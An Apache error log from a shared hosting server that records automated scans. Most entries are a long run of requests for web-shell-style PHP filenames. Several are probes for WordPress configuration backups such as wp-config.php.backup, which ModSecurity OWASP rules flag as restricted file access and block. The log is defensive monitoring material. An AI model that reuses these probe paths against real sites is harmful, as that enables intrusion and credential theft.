[Mon May 11 23:14:01.959691 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/fone1.php
[Mon May 11 23:14:02.205598 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/cilus.php
[Mon May 11 23:14:02.471394 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/adminfuns.php
[Mon May 11 23:14:02.714497 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/tires.php
[Mon May 11 23:14:03.158072 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wp-tiroto.php
[Mon May 11 23:14:03.548132 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/a7.php
[Mon May 11 23:14:04.017554 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/1.php
[Mon May 11 23:14:04.291012 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/drykl.php
[Mon May 11 23:14:04.544074 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/BDKR28WP.php
[Mon May 11 23:14:04.787892 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/mifta.php
[Mon May 11 23:14:05.148010 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xwx1.php
[Mon May 11 23:14:05.431520 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/a1.php
[Mon May 11 23:14:05.506988 2026] [authz_core:error] [pid 1606352:tid 1606419] [client 52.172.142.96:2527] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log
[Mon May 11 23:14:05.908474 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/d.php
[Mon May 11 23:14:06.203288 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/edit.php
[Mon May 11 23:14:06.556568 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xff.php
[Mon May 11 23:14:07.000789 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/bal.php
[Mon May 11 23:14:07.360072 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xltt.php
[Mon May 11 23:14:07.631065 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/son.php
[Mon May 11 23:14:07.959832 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/doc.php
[Mon May 11 23:14:08.211140 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/zo.php
[Mon May 11 23:14:08.754497 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xper1.php
[Mon May 11 23:14:09.125139 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/tiny.php
[Mon May 11 23:14:09.533442 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/bthil.php
[Mon May 11 23:14:09.809504 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/s1.php
[Mon May 11 23:14:11.040494 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/de.php
[Mon May 11 23:14:11.367855 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/axe.php
[Mon May 11 23:14:11.897981 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/roksad1.php
[Mon May 11 23:14:12.436892 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/aj11.php
[Mon May 11 23:14:12.706487 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/yuzuru1.php
[Mon May 11 23:14:13.159430 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/1a.php
[Mon May 11 23:14:13.408598 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/gelio1.php
[Mon May 11 23:14:13.824444 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/2.php
[Mon May 11 23:14:14.122140 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/sky.php
[Mon May 11 23:14:14.728925 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/man.php
[Mon May 11 23:14:15.098488 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ws85.php
[Mon May 11 23:14:15.356708 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/Sanskrit.php
[Mon May 11 23:14:15.604589 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ms-edit.php
[Mon May 11 23:14:16.233726 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/dass.php
[Mon May 11 23:14:16.502021 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 23:14:16.759464 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/cu.php
[Mon May 11 23:14:17.012889 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ganja.php
[Mon May 11 23:14:17.317306 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/pp.php
[Mon May 11 23:14:17.715241 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/card.php
[Mon May 11 23:14:18.189474 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/packsin1.php
[Mon May 11 23:14:18.680736 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wps.php
[Mon May 11 23:14:19.017278 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wgift1.php
[Mon May 11 23:14:19.269555 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/mar.php
[Mon May 11 23:14:19.458466 2026] [authz_core:error] [pid 1606352:tid 1606419] [client 52.172.142.96:2527] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log
[Mon May 11 23:14:19.530963 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/img.php
[Mon May 11 23:14:19.935016 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/themes.php
[Mon May 11 23:14:20.182310 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/acp.php
[Mon May 11 23:14:20.925363 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/error_log.php
[Mon May 11 23:14:21.169015 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/zdd.php
[Mon May 11 23:14:21.418650 2026] [security2:error] [pid 1606352:tid 1606439] [client 129.226.94.18:47160] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/conseil-accompagnement/"] [unique_id "agJGrXo_DFxNSZVmaX3gEQAAANQ"]
[Mon May 11 23:14:21.452345 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/link.php
[Mon May 11 23:14:21.697723 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/sallu.php
[Mon May 11 23:14:22.167201 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/aboute.php
[Mon May 11 23:14:22.783060 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ayk.php
[Mon May 11 23:14:23.131922 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/one.php
[Mon May 11 23:14:23.569475 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/press.php
[Mon May 11 23:14:23.816364 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ng.php
[Mon May 11 23:14:24.190816 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/tx79.php
[Mon May 11 23:14:25.143923 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wp-block.php
[Mon May 11 23:14:25.413212 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/8.php
[Mon May 11 23:14:25.917450 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/options.php
[Mon May 11 23:14:26.474267 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/admlo.php
[Mon May 11 23:14:26.741704 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/x=34.php
[Mon May 11 23:14:27.316178 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/tramuibs.php
[Mon May 11 23:14:28.150147 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/view.php
[Mon May 11 23:14:28.407400 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/aa.php
[Mon May 11 23:14:29.089437 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/x402.php
[Mon May 11 23:14:29.392100 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/lib.php
[Mon May 11 23:14:29.823833 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:29.944497 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:30.063352 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:30.619610 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ws78.php
[Mon May 11 23:14:30.619847 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:30.762895 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:30.881016 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:30.895745 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/f5.php
[Mon May 11 23:14:31.011949 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.144057 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.262543 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.384951 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.404456 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/alpha.php
[Mon May 11 23:14:31.505641 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.645024 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.763281 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:31.885664 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/wp-config.php.backup"] [unique_id "agJGtx2Cvzd_nyNfUm8OYAAAAQU"]
[Mon May 11 23:14:31.885823 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/wp-config.php.backup"] [unique_id "agJGtx2Cvzd_nyNfUm8OYAAAAQU"]
[Mon May 11 23:14:31.886110 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJGtx2Cvzd_nyNfUm8OYAAAAQU"]
[Mon May 11 23:14:32.032674 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:32.151108 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:32.288453 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:32.434667 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:32.554297 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:32.788777 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.032569 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.154946 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.275964 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.399686 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.518620 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.655341 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:33.790974 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:34.073284 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:34.191598 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:34.859380 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/backup.wp-config.php"] [unique_id "agJGuh2Cvzd_nyNfUm8OcQAAAQU"]
[Mon May 11 23:14:34.859531 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/backup.wp-config.php"] [unique_id "agJGuh2Cvzd_nyNfUm8OcQAAAQU"]
[Mon May 11 23:14:34.859803 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJGuh2Cvzd_nyNfUm8OcQAAAQU"]
[Mon May 11 23:14:35.330025 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:35.759142 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/son1.php
[Mon May 11 23:14:36.278716 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:36.397036 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:36.705595 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/ggb.php
[Mon May 11 23:14:36.707198 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:36.825152 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:37.079405 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/amxloxxr.php
[Mon May 11 23:14:37.400456 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/ss.php
[Mon May 11 23:14:37.501986 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:37.623661 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:37.645394 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/sadcut1.php
[Mon May 11 23:14:37.771706 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.283840 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.285070 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/rh.php
[Mon May 11 23:14:38.423436 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.521117 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/99.php
[Mon May 11 23:14:38.543027 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.664781 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.782958 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:38.850854 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/layout.php
[Mon May 11 23:14:39.005495 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.128715 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.247443 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.365695 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.386601 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/12.php
[Mon May 11 23:14:39.649705 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.794588 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:39.828147 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/fs.php
[Mon May 11 23:14:39.942566 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.062502 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/insta.php
[Mon May 11 23:14:40.077715 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/new-wp-config.php"] [unique_id "agJGwB2Cvzd_nyNfUm8OiQAAAQU"]
[Mon May 11 23:14:40.077853 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/new-wp-config.php"] [unique_id "agJGwB2Cvzd_nyNfUm8OiQAAAQU"]
[Mon May 11 23:14:40.078083 2026] [security2:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJGwB2Cvzd_nyNfUm8OiQAAAQU"]
[Mon May 11 23:14:40.238376 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.301475 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/simple.php
[Mon May 11 23:14:40.383208 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.505422 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.546278 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/ws81.php
[Mon May 11 23:14:40.637685 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.801743 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:40.834317 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/av.php
[Mon May 11 23:14:41.074958 2026] [:error] [pid 1605480:tid 1605527] [client 172.212.217.10:14509] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:14:41.208567 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/xfile25.php
[Mon May 11 23:14:41.444544 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/wpxml.php
